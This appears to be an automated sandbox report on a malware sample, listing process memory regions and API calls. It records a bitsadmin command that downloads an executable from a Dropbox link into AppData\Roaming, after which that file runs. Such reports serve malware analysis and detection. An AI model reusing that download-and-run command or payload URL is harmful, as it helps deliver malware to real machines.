ws2_32.dll 0x7feff040000 0x7feff08cfff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x7feff090000 0x7feff1bcfff Memory Mapped File Readable, Writable, Executable False False False
apisetschema.dll 0x7feff3b0000 0x7feff3b0fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory Readable True False False
private_0x000007fffffdd000 0x7fffffdd000 0x7fffffdefff Private Memory Readable, Writable True True False
private_0x000007fffffdf000 0x7fffffdf000 0x7fffffdffff Private Memory Readable, Writable True True False
Process #4: bitsadmin.exe
(Host: 188, Network: 4)
+
Information Value
ID #4
File Name c:\windows\system32\bitsadmin.exe
Command Line bitsadmin /transfer UKEF /download /priority normal https://www.dropbox.com/s/7b9332r6vmiuhxl/1qesyozananrivoxityof.exe?dl=1 C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:00:22, Reason: Child Process
Unmonitor End Time: 00:10:13, Reason: Terminated by Timeout
Monitor Duration 00:09:51
OS Process Information
+
Information Value
PID 0xa90
Parent PID 0xa50 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Groups
  • YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:00010636 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x A94
0x A98
0x A9C
0x AA0
0x AA4
0x B2C
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory Readable True False False
locale.nls 0x00050000 0x000b6fff Memory Mapped File Readable False False False
pagefile_0x00000000000c0000 0x000c0000 0x000c6fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000000d0000 0x000d0000 0x000d1fff Pagefile Backed Memory Readable, Writable True False False
bitsadmin.exe.mui 0x000e0000 0x000e0fff Memory Mapped File Readable, Writable False False False
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory Readable, Writable True True False
private_0x0000000000100000 0x00100000 0x00100fff Private Memory Readable, Writable True True False
pagefile_0x0000000000110000 0x00110000 0x00110fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000120000 0x00120000 0x00120fff Pagefile Backed Memory Readable True False False
private_0x0000000000170000 0x00170000 0x001effff Private Memory Readable, Writable True True False
private_0x0000000000220000 0x00220000 0x0031ffff Private Memory Readable, Writable True True False
private_0x0000000000320000 0x00320000 0x0041ffff Private Memory Readable, Writable True True False
rpcss.dll 0x00420000 0x0049cfff Memory Mapped File Readable False False False
rsaenh.dll 0x00420000 0x00464fff Memory Mapped File Readable False False False
private_0x00000000004a0000 0x004a0000 0x004affff Private Memory Readable, Writable True True False
pagefile_0x00000000004b0000 0x004b0000 0x00637fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000640000 0x00640000 0x007c0fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000007d0000 0x007d0000 0x01bcffff Pagefile Backed Memory Readable True False False
private_0x0000000001bd0000 0x01bd0000 0x01e0ffff Private Memory Readable, Writable True True False
pagefile_0x0000000001bd0000 0x01bd0000 0x01caefff Pagefile Backed Memory Readable True False False
private_0x0000000001ce0000 0x01ce0000 0x01d5ffff Private Memory Readable, Writable True True False
private_0x0000000001d90000 0x01d90000 0x01e0ffff Private Memory Readable, Writable True True False
private_0x0000000001eb0000 0x01eb0000 0x01f2ffff Private Memory Readable, Writable True True False
private_0x0000000001f50000 0x01f50000 0x01fcffff Private Memory Readable, Writable True True False
sortdefault.nls 0x01fd0000 0x0229efff Memory Mapped File Readable False False False
private_0x0000000002300000 0x02300000 0x0237ffff Private Memory Readable, Writable True True False
private_0x00000000023c0000 0x023c0000 0x0243ffff Private Memory Readable, Writable True True False
user32.dll 0x76e70000 0x76f69fff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x76f70000 0x7708efff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77090000 0x77238fff Memory Mapped File Readable, Writable, Executable False False False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True True False
bitsadmin.exe 0xff2a0000 0xff2f0fff Memory Mapped File Readable, Writable, Executable True False False
qmgrprxy.dll 0x7fef5020000 0x7fef502efff Memory Mapped File Readable, Writable, Executable False False False
uxtheme.dll 0x7fefb930000 0x7fefb985fff Memory Mapped File Readable, Writable, Executable False False False
version.dll 0x7fefc1a0000 0x7fefc1abfff Memory Mapped File Readable, Writable, Executable False False False
rsaenh.dll 0x7fefc5d0000 0x7fefc616fff Memory Mapped File Readable, Writable, Executable False False False
cryptsp.dll 0x7fefc8d0000 0x7fefc8e6fff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x7fefced0000 0x7fefcedefff Memory Mapped File Readable, Writable, Executable False False False
rpcrtremote.dll 0x7fefcfc0000 0x7fefcfd3fff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x7fefd320000 0x7fefd38afff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x7fefd3b0000 0x7fefd48afff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x7fefd490000 0x7fefd49dfff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x7fefd4a0000 0x7fefd568fff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x7fefd570000 0x7fefe2f7fff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x7fefe300000 0x7fefe32dfff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x7fefe330000 0x7fefe396fff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x7fefe810000 0x7fefea12fff Memory Mapped File Readable, Writable, Executable False False False
clbcatq.dll 0x7fefeb50000 0x7fefebe8fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x7fefebf0000 0x7fefecf8fff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x7fefed80000 0x7fefedf0fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x7fefef80000 0x7feff01efff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x7feff020000 0x7feff03efff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x7feff090000 0x7feff1bcfff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x7feff1c0000 0x7feff296fff Memory Mapped File Readable, Writable, Executable False False False
apisetschema.dll 0x7feff3b0000 0x7feff3b0fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory Readable True False False
private_0x000007fffffd3000 0x7fffffd3000 0x7fffffd4fff Private Memory Readable, Writable True True False
private_0x000007fffffd5000 0x7fffffd5000 0x7fffffd6fff Private Memory Readable, Writable True True False
private_0x000007fffffd7000 0x7fffffd7000 0x7fffffd8fff Private Memory Readable, Writable True True False
private_0x000007fffffd9000 0x7fffffd9000 0x7fffffdafff Private Memory Readable, Writable True True False
private_0x000007fffffdb000 0x7fffffdb000 0x7fffffdcfff Private Memory Readable, Writable True True False
private_0x000007fffffdd000 0x7fffffdd000 0x7fffffdefff Private Memory Readable, Writable True True False
private_0x000007fffffdf000 0x7fffffdf000 0x7fffffdffff Private Memory Readable, Writable True True False
Threads
Thread 0xa94
(Host: 171, Network: 4)
+
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-01-10 10:49:13 (UTC) True 1
Fn
System Get Time type = Ticks, time = 88889 True 1
Fn
Module Get Handle module_name = c:\windows\system32\bitsadmin.exe, base_address = 0xff2a0000 True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x76f70000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = HeapSetInformation, address_out = 0x76f8c4a0 True 1
Fn
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x76f70000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x76f86d40 True 1
Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type True 1
Fn
File Write filename = STD_OUTPUT_HANDLE, size = 2 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 36 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 30 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 41 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 2 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 94 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 88 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 2 True 1
Fn
Data
File Open filename = STD_INPUT_HANDLE True 2
Fn
COM Create interface = 5CE34C0D-0DC9-4C1F-897C-DAA1B78CEE7C, cls_context = CLSCTX_LOCAL_SERVER True 1
Fn
Inet Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS True 1
Fn
Inet Open Connection protocol = https, server_name = www.dropbox.com, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /s/7b9332r6vmiuhxl/1qesyozananrivoxityof.exe True 1
Fn
Inet Send HTTP Request url = https://www.dropbox.com/s/7b9332r6vmiuhxl/1qesyozananrivoxityof.exe?dl=1 True 1
Fn
File Open filename = STD_INPUT_HANDLE True 2
Fn
System Sleep duration = -1 (infinite) True 1
Fn
File Write filename = STD_OUTPUT_HANDLE, size = 10 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 5 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 7 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 8 True 2
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 12 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 10 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 6 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 8 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 5 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 8 True 1
Fn
Data
System Get Time type = System Time, time = 2018-01-10 10:49:13 (UTC) True 2
Fn
File Write filename = STD_OUTPUT_HANDLE, size = 13 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 15 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 8 True 1
Fn
Data
System Sleep duration = -1 (infinite) True 1
Fn
File Write filename = STD_OUTPUT_HANDLE, size = 10 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 5 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 7 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 8 True 2
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 12 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 10 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 6 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 8 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 5 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 8 True 1
Fn
Data
System Get Time type = System Time, time = 2018-01-10 18:51:56 (UTC) True 1
Fn
File Write filename = STD_OUTPUT_HANDLE, size = 17 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 15 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 8 True 1
Fn
Data
System Sleep duration = 1000 milliseconds (1.000 seconds) True 1
Fn
File Write filename = STD_OUTPUT_HANDLE, size = 10 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 5 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 7 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 8 True 2
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 12 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 10 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 6 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 8 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 5 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 8 True 1
Fn
Data
System Get Time type = System Time, time = 2018-01-10 18:51:56 (UTC) True 1
Fn
File Write filename = STD_OUTPUT_HANDLE, size = 17 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 15 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 8 True 1
Fn
Data
System Sleep duration = -1 (infinite) True 2
Fn
File Write filename = STD_OUTPUT_HANDLE, size = 10 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 5 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 7 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 8 True 2
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 14 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 10 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 6 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 8 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 5 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 8 True 1
Fn
Data
System Get Time type = System Time, time = 2018-01-10 18:52:04 (UTC) True 1
Fn
File Write filename = STD_OUTPUT_HANDLE, size = 20 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 15 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 11 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 16 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 9 True 1
Fn
Data
System Sleep duration = -1 (infinite) True 1
Fn
System Sleep duration = 1000 milliseconds (1.000 seconds) True 1
Fn
File Write filename = STD_OUTPUT_HANDLE, size = 10 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 5 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 7 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 8 True 2
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 14 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 10 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 6 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 8 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 5 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 8 True 1
Fn
Data
System Get Time type = System Time, time = 2018-01-10 18:52:10 (UTC) True 1
Fn
File Write filename = STD_OUTPUT_HANDLE, size = 21 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 15 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 10 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 16 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 9 True 1
Fn
Data
System Sleep duration = -1 (infinite) True 2
Fn
System Sleep duration = 1000 milliseconds (1.000 seconds) True 1
Fn
File Write filename = STD_OUTPUT_HANDLE, size = 10 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 5 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 7 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 8 True 2
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 14 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 10 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 6 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 8 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 5 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 8 True 1
Fn
Data
System Get Time type = System Time, time = 2018-01-10 18:52:15 (UTC) True 1
Fn
File Write filename = STD_OUTPUT_HANDLE, size = 22 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 15 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 10 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 16 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 10 True 1
Fn
Data
System Sleep duration = -1 (infinite) True 2
Fn
System Sleep duration = 1000 milliseconds (1.000 seconds) True 1
Fn
File Write filename = STD_OUTPUT_HANDLE, size = 10 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 5 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 7 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 8 True 2
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 14 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 10 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 6 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 8 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 5 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 8 True 1
Fn
Data
System Get Time type = System Time, time = 2018-01-10 18:52:25 (UTC) True 1
Fn
File Write filename = STD_OUTPUT_HANDLE, size = 22 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 15 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 10 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 16 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 10 True 1
Fn
Data
System Sleep duration = -1 (infinite) True 2
Fn
System Sleep duration = 1000 milliseconds (1.000 seconds) True 1
Fn
File Write filename = STD_OUTPUT_HANDLE, size = 10 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 5 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 7 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 8 True 2
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 14 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 10 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 6 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 8 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 5 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 8 True 1
Fn
Data
System Get Time type = System Time, time = 2018-01-10 18:52:35 (UTC) True 1
Fn
File Write filename = STD_OUTPUT_HANDLE, size = 23 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 15 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 10 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 16 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 9 True 1
Fn
Data
System Sleep duration = -1 (infinite) True 2
Fn
File Write filename = STD_OUTPUT_HANDLE, size = 10 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 5 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 7 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 8 True 2
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 13 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 10 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 6 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 8 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 5 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 8 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 22 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 2 True 1
Fn
Data
File Write filename = STD_OUTPUT_HANDLE, size = 20 True 1
Fn
Data
File Open filename = STD_INPUT_HANDLE True 1
Fn
Process #6: iuoldw.exe
(Host: 1074, Network: 0)
+
Information Value
ID #6
File Name c:\users\aetadzjz\appdata\roaming\iuoldw.exe
Command Line C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:16, Reason: Child Process
Unmonitor End Time: 00:10:13, Reason: Terminated by Timeout
Monitor Duration 00:08:57
OS Process Information
+
Information Value
PID 0x65c
Parent PID 0xa50 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Groups
  • YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:00010636 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 8EC
0x 6C4
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True True False
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True True False
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True True False
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True True False
private_0x0000000000090000 0x00090000 0x0018ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False
locale.nls 0x001a0000 0x00206fff Memory Mapped File Readable False False False
private_0x0000000000210000 0x00210000 0x0026ffff Private Memory Readable, Writable True True False
private_0x0000000000210000 0x00210000 0x0021ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000220000 0x00220000 0x00226fff Pagefile Backed Memory Readable True False False
private_0x0000000000230000 0x00230000 0x0026ffff Private Memory Readable, Writable True True False
private_0x0000000000270000 0x00270000 0x0027ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000280000 0x00280000 0x00281fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000290000 0x00290000 0x00297fff Private Memory Readable, Writable True True False
pagefile_0x00000000002a0000 0x002a0000 0x002a0fff Pagefile Backed Memory Readable, Writable True False False
private_0x00000000002b0000 0x002b0000 0x0032ffff Private Memory Readable, Writable True True False
private_0x0000000000330000 0x00330000 0x0039ffff Private Memory Readable, Writable True True False
private_0x0000000000330000 0x00330000 0x0033ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000330000 0x00330000 0x00336fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000330000 0x00330000 0x0033ffff Private Memory Readable, Writable True True False
private_0x0000000000330000 0x00330000 0x0033ffff Private Memory Readable, Writable True True False
private_0x0000000000330000 0x00330000 0x0033ffff Private Memory Readable, Writable True True False
private_0x0000000000330000 0x00330000 0x0033ffff Private Memory Readable, Writable True True False
private_0x0000000000330000 0x00330000 0x0033ffff Private Memory Readable, Writable True True False
private_0x0000000000330000 0x00330000 0x0033ffff Private Memory Readable, Writable True True False
private_0x0000000000330000 0x00330000 0x0033ffff Private Memory Readable, Writable True True False
private_0x0000000000330000 0x00330000 0x0033ffff Private Memory Readable, Writable True True False
private_0x0000000000330000 0x00330000 0x0033ffff Private Memory Readable, Writable True True False
private_0x0000000000330000 0x00330000 0x0035ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000340000 0x00340000 0x00346fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000360000 0x00360000 0x0039ffff Private Memory Readable, Writable True True False
private_0x00000000003a0000 0x003a0000 0x003dffff Private Memory Readable, Writable True True False
iuoldw.exe 0x00400000 0x00432fff Memory Mapped File Readable, Writable, Executable True True False
private_0x0000000000400000 0x00400000 0x0041bfff Private Memory Readable, Writable, Executable True True False
pagefile_0x0000000000440000 0x00440000 0x0051efff Pagefile Backed Memory Readable True False False
private_0x0000000000550000 0x00550000 0x0064ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000650000 0x00650000 0x007d7fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000007e0000 0x007e0000 0x00960fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000970000 0x00970000 0x01d6ffff Pagefile Backed Memory Readable True False False
private_0x0000000001d70000 0x01d70000 0x01eaffff Private Memory Readable, Writable True True False
private_0x0000000001d70000 0x01d70000 0x01deffff Private Memory Readable, Writable True True False
private_0x0000000001df0000 0x01df0000 0x01e8ffff Private Memory Readable, Writable True True False
private_0x0000000001ea0000 0x01ea0000 0x01eaffff Private Memory Readable, Writable True True False
private_0x0000000001eb0000 0x01eb0000 0x022affff Private Memory Readable, Writable True True False
sortdefault.nls 0x022b0000 0x0257efff Memory Mapped File Readable False False False
private_0x0000000002580000 0x02580000 0x026fffff Private Memory Readable, Writable True True False
private_0x0000000002580000 0x02580000 0x0266ffff Private Memory Readable, Writable True True False
rsaenh.dll 0x02580000 0x025bbfff Memory Mapped File Readable False False False
private_0x0000000002630000 0x02630000 0x0266ffff Private Memory Readable, Writable True True False
private_0x00000000026c0000 0x026c0000 0x026fffff Private Memory Readable, Writable True True False
private_0x0000000002700000 0x02700000 0x0286ffff Private Memory Readable, Writable True True False
private_0x0000000002700000 0x02700000 0x027fffff Private Memory Readable, Writable True True False
private_0x0000000002860000 0x02860000 0x0286ffff Private Memory Readable, Writable True True False
pagefile_0x0000000002870000 0x02870000 0x02c62fff Pagefile Backed Memory Readable True False False
staticcache.dat 0x02c70000 0x0359ffff Memory Mapped File Readable False False False
private_0x00000000035a0000 0x035a0000 0x0b59ffff Private Memory Readable, Writable, Executable True False False
msvbvm60.dll 0x72940000 0x72a92fff Memory Mapped File Readable, Writable, Executable True False False
dwmapi.dll 0x74640000 0x74652fff Memory Mapped File Readable, Writable, Executable False False False
uxtheme.dll 0x74660000 0x746dffff Memory Mapped File Readable, Writable, Executable False False False
wow64cpu.dll 0x746f0000 0x746f7fff Memory Mapped File Readable, Writable, Executable False False False
wow64win.dll 0x74700000 0x7475bfff Memory Mapped File Readable, Writable, Executable False False False
wow64.dll 0x74760000 0x7479efff Memory Mapped File Readable, Writable, Executable False False False
ntmarta.dll 0x74850000 0x74870fff Memory Mapped File Readable, Writable, Executable False False False
